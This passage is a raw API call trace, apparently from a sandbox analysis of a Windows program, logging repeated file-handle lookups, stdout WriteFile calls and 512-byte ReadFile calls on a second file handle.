_get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] GetFileType (hFile=0x50) returned 0x1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] GetFileType (hFile=0x50) returned 0x1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] GetFileType (hFile=0x50) returned 0x1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.536] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0152.536] GetFileType (hFile=0x50) returned 0x1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] GetFileType (hFile=0x50) returned 0x1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] GetFileType (hFile=0x50) returned 0x1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.537] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.537] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.537] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.537] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] GetFileType (hFile=0x50) returned 0x1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] GetFileType (hFile=0x50) returned 0x1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] GetFileType (hFile=0x50) returned 0x1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] GetFileType (hFile=0x50) returned 0x1 [0152.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.537] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] GetFileType (hFile=0x50) returned 0x1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] GetFileType (hFile=0x50) returned 0x1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] GetFileType (hFile=0x50) returned 0x1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, 
lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] GetFileType (hFile=0x50) returned 0x1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.538] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.538] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.538] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.538] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] GetFileType (hFile=0x50) returned 0x1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] GetFileType (hFile=0x50) returned 0x1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] GetFileType (hFile=0x50) returned 0x1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] GetFileType (hFile=0x50) returned 0x1 [0152.539] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] GetFileType (hFile=0x50) returned 0x1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] GetFileType (hFile=0x50) returned 0x1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] GetFileType (hFile=0x50) returned 0x1 [0152.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.539] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] GetFileType (hFile=0x50) returned 0x1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.540] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.540] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.540] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.540] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] GetFileType (hFile=0x50) returned 0x1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] GetFileType (hFile=0x50) returned 0x1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] GetFileType (hFile=0x50) returned 0x1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] GetFileType (hFile=0x50) returned 0x1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.540] GetFileType (hFile=0x50) returned 0x1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.541] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, 
lpOverlapped=0x0) returned 1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.541] GetFileType (hFile=0x50) returned 0x1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.541] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.541] GetFileType (hFile=0x50) returned 0x1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.541] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.541] GetFileType (hFile=0x50) returned 0x1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.541] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.541] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.541] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.541] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.541] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.541] GetFileType (hFile=0x50) returned 0x1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.541] GetFileType (hFile=0x50) returned 0x1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.541] WriteFile (in: hFile=0x50, 
lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] GetFileType (hFile=0x50) returned 0x1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] GetFileType (hFile=0x50) returned 0x1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] GetFileType (hFile=0x50) returned 0x1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] GetFileType (hFile=0x50) returned 0x1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] GetFileType (hFile=0x50) returned 0x1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] GetFileType (hFile=0x50) returned 0x1 [0152.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.543] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.543] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.543] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.543] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.543] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.543] GetFileType (hFile=0x50) returned 0x1 [0152.543] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.543] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.543] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.543] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, 
lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: 
lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, 
lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, 